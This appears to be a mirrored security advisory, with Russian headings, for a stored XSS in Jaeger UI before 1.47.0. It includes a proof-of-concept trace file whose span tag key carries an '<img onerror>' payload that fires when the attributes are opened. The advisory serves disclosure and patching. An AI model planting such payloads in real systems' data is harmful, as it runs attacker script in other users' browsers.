Описание
A stored XSS in jaeger UI might allow an attacker who controls a trace to perform arbitrary jaeger queries
Related UI vulnerability advisory: https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r
Summary
Jaeger UI is using the json-markup dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus the KeyValuesTable is vulnerable to XSS.
Details
The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49
PoC
- Start a Jaeger UI
- Save the following trace as a file:
{
"data": [
{
"traceID": "076ef819cc06c45a",
"spans": [
{
"traceID": "076ef819cc06c45a",
"spanID": "076ef819cc06c45a",
"flags": 1,
"operationName": "and open 'attributes'",
"references": [],
"startTime": 1678196149232010,
"duration": 13485,
"tags": [
{
"key": "sampler.type",
"type": "string",
"value": "{\"<img src=x onerror=alert(1)>\":\"test\"}"
}
],
"logs": [],
"processID": "p1",
"warnings": null
}
],
"processes": {
"p1": {
"serviceName": "click here",
"tags": [
]
}
},
"warnings": null
}
],
"total": 0,
"limit": 0,
"offset": 0,
"errors": null
}
- Upload that trace to Jaeger UI in order to visualise it.
- Open the trace, open it's span's attributes.
- XSS should be fired.
Impact
This is a XSS on Jaeger UI. XSS can be used to run JavaScript.
Ссылки
- https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r
- https://github.com/jaegertracing/jaeger/security/advisories/GHSA-2w8w-qhg4-f78j
- https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49
Пакеты
Наименование
github.com/jaegertracing/jaeger
go
Затронутые версииВерсия исправления
< 1.47.0
1.47.0
6.5 Medium
CVSS3
Дефекты
CWE-79
6.5 Medium
CVSS3
Дефекты
CWE-79